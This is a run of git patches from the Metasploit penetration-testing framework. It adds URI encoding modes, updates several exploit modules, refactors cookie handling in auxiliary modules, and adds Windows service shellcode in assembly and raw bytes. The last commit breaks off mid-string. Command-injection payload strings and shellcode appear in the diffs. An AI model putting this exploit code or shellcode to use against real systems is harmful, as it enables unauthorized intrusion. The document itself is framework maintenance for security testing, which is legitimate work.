OptInt.new('HTTP::pad_uri_version_count', [false, 'How many whitespace characters to use between the uri and version', 1]), diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index e67da387f2..c4128fc259 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -40,7 +40,7 @@ class ClientRequest # 'encode_params' => true, 'encode' => false, - 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all + 'uri_encode_mode' => 'hex-normal', # hex-noslashes, hex-random, u-normal, u-random, u-all 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool 'pad_method_uri_count' => 1, # integer diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 56e0ceb791..533e3db903 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -788,15 +788,18 @@ module Text return str if mode == 'none' # fast track no encoding - all = /[^\/\\]+/ + all = /./ + noslashes = /[^\/\\]+/ # http://tools.ietf.org/html/rfc3986#section-2.3 normal = /[^a-zA-Z0-9\/\\\.\-_~]+/ case mode - when 'hex-normal' - return str.gsub(normal) { |s| Rex::Text.to_hex(s, '%') } when 'hex-all' return str.gsub(all) { |s| Rex::Text.to_hex(s, '%') } + when 'hex-normal' + return str.gsub(normal) { |s| Rex::Text.to_hex(s, '%') } + when 'hex-noslashes' + return str.gsub(noslashes) { |s| Rex::Text.to_hex(s, '%') } when 'hex-random' res = '' str.each_byte do |c| diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 36dbc96e70..5dae86e055 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote # Make sure the URI begins with a slash uri = normalize_uri(datastore['URI']) - command = Rex::Text.uri_encode(payload.raw, 'hex-all') + command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes') command.gsub!("%20","%2520") res = send_request_cgi({ 'uri' => "/api"+ uri + "/log/graph/%60#{command}%60", diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 61a67e8e40..e05d35ef74 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -1,4 +1,4 @@ -## +s## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote max.times { chars << rand(string.length)} end end - chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")} + chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-noslashes")} string end diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index e5bab5f8eb..dc5a7eeb1f 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - command = Rex::Text.uri_encode(payload.raw, 'hex-all') + command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes') res = send_request_raw({ 'uri' => normalize_uri(datastore['URI']) + "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end", 'method' => 'GET', diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 1e172296cc..53e698877c 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - command = Rex::Text.uri_encode(payload.raw, 'hex-all') + command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes') urlconfigdir = normalize_uri(datastore['URI']) + '/' + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end" res = send_request_raw({ diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 0fc4a1113c..0063e8ec4e 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << self.send(my_target[:rop]) sploit << p.encoded - resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all') + resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-noslashes') cli.send_response(resp) # handle the payload diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index c76a9d2dee..f11b2b48e8 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -229,8 +229,8 @@ describe Rex::Proto::Http::ClientRequest do end end - context "and 'uri_encode_mode' = hex-all" do - let(:encode_mode) { 'hex-all' } + context "and 'uri_encode_mode' = hex-noslashes" do + let(:encode_mode) { 'hex-noslashes' } it "should encode all chars" do str = client_request.to_s str.should include("%66%6f%6f%5b%5d=%62%61%72") From cba39a9a043f528e5c2e7cd6287fab740359fd8b Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 12:01:06 -0500 Subject: [PATCH 282/853] Adds spec for 'hex-all' mode --- spec/lib/rex/proto/http/client_request_spec.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index f11b2b48e8..2fcd6e0271 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -189,6 +189,7 @@ describe Rex::Proto::Http::ClientRequest do 'foo[]' => 'bar', 'bar' => 'baz', 'frobnicate' => 'the froozle?', + 'foshizzle' => 'my/nizzle', } end @@ -215,6 +216,7 @@ describe Rex::Proto::Http::ClientRequest do str.should include("foo[]=bar") str.should include("bar=baz") str.should include("frobnicate=the froozle?") + str.should include("foshizzle=my/nizzle") end end @@ -226,6 +228,7 @@ describe Rex::Proto::Http::ClientRequest do str.should include("foo%5b%5d=bar") str.should include("bar=baz") str.should include("frobnicate=the%20froozle%3f") + str.should include("foshizzle=my/nizzle") end end @@ -236,6 +239,18 @@ describe Rex::Proto::Http::ClientRequest do str.should include("%66%6f%6f%5b%5d=%62%61%72") str.should include("%62%61%72=%62%61%7a") str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + str.should include("%66%6f%73%68%69%7a%7a%6c%65=%6d%79/%6e%69%7a%7a%6c%65") + end + end + + context "and 'uri_encode_mode' = hex-all" do + let(:encode_mode) { 'hex-all' } + it "should encode all chars" do + str = client_request.to_s + str.should include("%66%6f%6f%5b%5d%3d%62%61%72") + str.should include("%62%61%72%3d%62%61%7a") + str.should include("%66%72%6f%62%6e%69%63%61%74%65%3d%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + str.should include("%66%6f%73%68%69%7a%7a%6c%65%3d%6d%79%2f%6e%69%7a%7a%6c%65") end end From 638ae477d9ab51607861b65d97d77d36119d21ae Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 12:10:30 -0500 Subject: [PATCH 283/853] Fix up spec. Rex::Proto::Http::ClientRequest handles & and = outside of Rex::Text::uri_encode, so mode doesn't affect them. Fix erroneous typo char. --- modules/exploits/multi/http/php_cgi_arg_injection.rb | 2 +- spec/lib/rex/proto/http/client_request_spec.rb | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index e05d35ef74..b115e056f0 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -1,4 +1,4 @@ -s## +## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 2fcd6e0271..64c917fea2 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -247,10 +247,10 @@ describe Rex::Proto::Http::ClientRequest do let(:encode_mode) { 'hex-all' } it "should encode all chars" do str = client_request.to_s - str.should include("%66%6f%6f%5b%5d%3d%62%61%72") - str.should include("%62%61%72%3d%62%61%7a") - str.should include("%66%72%6f%62%6e%69%63%61%74%65%3d%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") - str.should include("%66%6f%73%68%69%7a%7a%6c%65%3d%6d%79%2f%6e%69%7a%7a%6c%65") + str.should include("%66%6f%6f%5b%5d=%62%61%72") + str.should include("%62%61%72=%62%61%7a") + str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + str.should include("%66%6f%73%68%69%7a%7a%6c%65=%6d%79%2f%6e%69%7a%7a%6c%65") end end From d82bc11b7d3e8130c26862d590aafce66f648062 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 13:01:05 -0500 Subject: [PATCH 284/853] Add 'u-noslashes' and re-order cases for consistency. --- lib/rex/text.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 533e3db903..fcf5bdb241 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -809,10 +809,12 @@ module Text b.gsub(normal){ |s| Rex::Text.to_hex(s, '%') } ) end return res - when 'u-normal' - return str.gsub(normal) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) } when 'u-all' return str.gsub(all) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) } + when 'u-normal' + return str.gsub(normal) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) } + when 'u-noslashes' + return str.gsub(noslashes) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) } when 'u-random' res = '' str.each_byte do |c| From a3cc499a171feaee69fb7ffef44e131b08c901c9 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 13:02:54 -0500 Subject: [PATCH 285/853] Update comment w/ all modes --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c4128fc259..3461ed5081 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -40,7 +40,7 @@ class ClientRequest # 'encode_params' => true, 'encode' => false, - 'uri_encode_mode' => 'hex-normal', # hex-noslashes, hex-random, u-normal, u-random, u-all + 'uri_encode_mode' => 'hex-normal', # hex-all, hex-noslashes, hex-random, u-all, u-noslashes, u-random 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool 'pad_method_uri_count' => 1, # integer From 2849a1bc0cd1620affdd11870b2d943a486702fb Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 13:10:20 -0500 Subject: [PATCH 286/853] Update comment again --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 3461ed5081..2758d8fa77 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -40,7 +40,7 @@ class ClientRequest # 'encode_params' => true, 'encode' => false, - 'uri_encode_mode' => 'hex-normal', # hex-all, hex-noslashes, hex-random, u-all, u-noslashes, u-random + 'uri_encode_mode' => 'hex-normal', # hex-normal, hex-all, hex-noslashes, hex-random, u-normal, u-all, u-noslashes, u-random 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool 'pad_method_uri_count' => 1, # integer From 3f3283ba060682b183c64d74fe0d3e084d43f1e8 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 12 May 2014 21:23:30 +0200 Subject: [PATCH 287/853] Resolved some msftidy warnings (Set-Cookie) --- .../auxiliary/admin/2wire/xslt_password_reset.rb | 3 ++- modules/auxiliary/admin/http/axigen_file_access.rb | 2 +- .../admin/http/cfme_manageiq_evm_pass_reset.rb | 2 +- .../http/foreman_openstack_satellite_priv_esc.rb | 2 +- .../admin/http/mutiny_frontend_read_delete.rb | 4 ++-- .../auxiliary/admin/http/tomcat_administration.rb | 4 ++-- modules/auxiliary/admin/oracle/osb_execqr2.rb | 6 ++---- modules/auxiliary/admin/oracle/osb_execqr3.rb | 6 ++---- .../auxiliary/admin/webmin/edit_html_fileaccess.rb | 4 ++-- modules/auxiliary/fuzzers/http/http_form_field.rb | 13 ++++++++----- modules/auxiliary/gather/apache_rave_creds.rb | 2 +- .../auxiliary/gather/doliwamp_traversal_creds.rb | 2 +- modules/auxiliary/scanner/http/cisco_asa_asdm.rb | 4 ++-- .../auxiliary/scanner/http/cisco_ironport_enum.rb | 8 ++++---- tools/msftidy.rb | 4 ++-- 15 files changed, 33 insertions(+), 33 deletions(-) diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index 2d37d2d45c..d44d0d6b5f 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -130,7 +130,8 @@ class Metasploit3 < Msf::Auxiliary }, 25) if res and res.code == 200 - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//)) + cookies = res.get_cookies + if cookies && cookies.match(/(.*); path=\//) cookie= $1 print_status("Got cookie #{cookie}. Password reset was successful!\n") end diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 2b3e656c44..00ac0f0404 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 303 and res.headers['Location'] =~ /_h=([a-f0-9]*)/ @token = $1 - if res.headers['Set-Cookie'] =~ /_hadmin=([a-f0-9]*)/ + if res.get_cookies =~ /_hadmin=([a-f0-9]*)/ @session = $1 return true end diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index 633e009fe4..15a995d8a0 100644 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -113,7 +113,7 @@ class Metasploit4 < Msf::Auxiliary print_error($1) return else - session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/ + session = $1 if res.get_cookies =~ /_vmdb_session=(\h*)/ if session.nil? print_error('Failed to retrieve the current session id') diff --git a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb index bdd15b4d30..e838b4d12c 100644 --- a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb @@ -67,7 +67,7 @@ class Metasploit4 < Msf::Auxiliary print_error('Authentication failed') return else - session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/ + session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/ if session.nil? print_error('Failed to retrieve the current session id') diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index 32c3ce4654..dc262ee55a 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/ first_session = $1 end @@ -165,7 +165,7 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => "JSESSIONID=#{first_session}" }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/ @session = $1 return true end diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index b40fb44141..ecc0464e17 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/admin/', }, 25) - if (res and res.code == 200) + if res && res.code == 200 - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/JSESSIONID=(.*);(.*)/i)) + if res.get_cookies.match(/JSESSIONID=(.*);(.*)/i) jsessionid = $1 diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 261ab2395a..b10f76cd21 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -49,9 +49,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'POST', }, 5) - if (res and res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) print_status("Sending command: #{datastore['CMD']}...") @@ -59,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary { 'uri' => '/property_box.php', 'data' => 'type=Sections&vollist=75' + Rex::Text.uri_encode("&" + cmd), - 'cookie' => sessionid, + 'cookie' => res.get_cookies, 'method' => 'POST', }, 5) diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index 06264af018..d833ef5406 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -46,9 +46,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'POST', }, 5) - if (res and res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) print_status("Sending command: #{datastore['CMD']}...") @@ -56,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary { 'uri' => '/property_box.php', 'data' => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd), - 'cookie' => sessionid, + 'cookie' => res.get_cookies, 'method' => 'POST', }, 5) diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 5fe695a22f..31edbcc74b 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || '' + if res and res.code == 302 and res.get_cookies =~ /sid/ + session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? print_good "#{peer} - Authentication successful" else diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index 0e3f0a0454..7c879f4c7b 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -455,21 +455,23 @@ class Metasploit3 < Msf::Auxiliary formidx = formidx + 1 formcnt += 1 end + if forms.size > 0 print_status(" Forms : ") end + forms.each do | thisform | print_status(" - Name : #{thisform[:name]}, ID : #{thisform[:id]}, Action : #{thisform[:action]}, Method : #{thisform[:method]}") end + return forms end - def extract_cookie(body) - return body["Set-Cookie"] - end + def set_cookie(cookie) @get_data_headers["Cookie"]=cookie @send_data[:headers]["Cookie"]=cookie end + def run init_fuzzdata() init_vars() @@ -487,10 +489,11 @@ class Metasploit3 < Msf::Auxiliary print_error("No response") return end + if datastore['HANDLECOOKIES'] - cookie = extract_cookie(response.headers) + cookie = response.get_cookies set_cookie(cookie) - print_status("Set cookie:#{cookie}") + print_status("Set cookie: #{cookie}") print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']} using cookies") response = send_request_raw( diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb index d9eeaf457c..1b654779fc 100644 --- a/modules/auxiliary/gather/apache_rave_creds.rb +++ b/modules/auxiliary/gather/apache_rave_creds.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary } }) - if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.get_cookies =~ /JSESSIONID=(.*);/ return $1 else return nil diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index f53eef3a90..fdf092ed90 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary }) if !res print_error("#{peer} - Connection failed") - elsif res.code == 200 and res.headers["set-cookie"] =~ /DOLSESSID_([a-f0-9]{32})=/ + elsif res.code == 200 and res.get_cookies =~ /DOLSESSID_([a-f0-9]{32})=/ return "DOLSESSID_#{$1}=#{token}" else print_warning("#{peer} - Could not create session cookie") diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index 4cd4492430..f60c22c38d 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && - res.headers['Set-Cookie'].match(/webvpn/) + res.get_cookies.include?('webvpn') return true else @@ -135,4 +135,4 @@ class Metasploit3 < Msf::Auxiliary return :abort end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb index 6d58cb1cae..75c37b5f0b 100644 --- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb +++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb @@ -77,15 +77,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) - if (res and res.headers['Set-Cookie']) + if res && res.get_cookies - cookie = res.headers['Set-Cookie'].split('; ')[0] + cookie = res.get_cookies res = send_request_cgi( { 'uri' => "/help/wwhelp/wwhimpl/common/html/default.htm", 'method' => 'GET', - 'cookie' => '#{cookie}' + 'cookie' => cookie }) if (res and res.code == 200 and res.body.include?('Cisco IronPort AsyncOS')) @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary } }) - if (res and res.headers['Set-Cookie'].include?('authenticated=')) + if res and res.get_cookies.include?('authenticated=') print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_hash = { diff --git a/tools/msftidy.rb b/tools/msftidy.rb index ae7072ff77..8c5d82458d 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -476,8 +476,8 @@ class Msftidy error("datastore is modified in code: #{ln}", idx) end - # do not read Set-Cookie header - if ln =~ /\[['"]Set-Cookie['"]\]/i + # do not read Set-Cookie header (ignore commented lines) + if ln =~ /^(?!\s*#).+\[['"]Set-Cookie['"]\]/i warn("Do not read Set-Cookie header directly, use res.get_cookies instead: #{ln}", idx) end From 513f3de0f829f19eb0b84cc02fcb558a6b7876e3 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Sun, 17 Nov 2013 18:46:10 +0100 Subject: [PATCH 288/853] new service exe creation refreshed --- .../windows/x86/src/block/block_service.asm | 64 +++++++++++++++ .../x86/src/single/single_service_stuff.asm | 17 ++++ lib/msf/util/exe.rb | 79 +++++++++++++++---- modules/exploits/windows/smb/psexec.rb | 1 + 4 files changed, 146 insertions(+), 15 deletions(-) create mode 100644 external/source/shellcode/windows/x86/src/block/block_service.asm create mode 100644 external/source/shellcode/windows/x86/src/single/single_service_stuff.asm diff --git a/external/source/shellcode/windows/x86/src/block/block_service.asm b/external/source/shellcode/windows/x86/src/block/block_service.asm new file mode 100644 index 0000000000..cae63fcd34 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_service.asm @@ -0,0 +1,64 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 137 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +push byte 0x0 +push 0x32336970 +push 0x61766461 +push esp +push 0x726774c +call ebp ;load advapi32.dll +push 0x00454349 +push 0x56524553 +mov ecx, esp ;ServiceTableEntry.SVCNAME +lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain +push 0x00000000 +push eax +push ecx +mov eax,esp +push 0x00000000 +push eax +push 0xCB72F7FA +call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry) +push 0x00000000 +push 0x56A2B5F0 +call ebp ;call ExitProcess(0) +pop eax ;SvcCtrlHandler +pop eax +pop eax +pop eax +xor eax,eax +ret +cld ;SvcMain +call me +me: +pop ebp +sub ebp, 0xd6 ;ebp => hashFunction +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCNAME +lea eax, [ebp+0xc9];SvcCtrlHandler +push 0x00000000 +push eax +push ecx +push 0x5244AA0B +call ebp ;RegisterServiceCtrlHandlerExA +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000004 +push 0x00000010 +mov ecx, esp +push 0x00000000 +push ecx +push eax +push 0x7D3755C6 +call ebp ;SetServiceStatus RUNNING \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm new file mode 100644 index 0000000000..e5aad30bcf --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -0,0 +1,17 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 189 bytes + strlen(libpath) + 1 +; Build: >build.py single_service_stuff +;-----------------------------------------------------------------------------; + +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; pop off the address of 'api_call' for calling later. +%include "./src/block/block_service.asm" \ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 55381967d2..485b1ef217 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -392,32 +392,81 @@ require 'msf/core/exe/segment_injector' case opts[:exe_type] when :service_exe + exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) max_length = 8192 name = opts[:servicename] - if name - bo = pe.index('SERVICENAME') - raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo - pe[bo, 11] = [name].pack('a11') + if not name + name = Rex::Text.rand_text_alpha(7) + end + #code_service could be encoded in the future + code_service = + "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + + 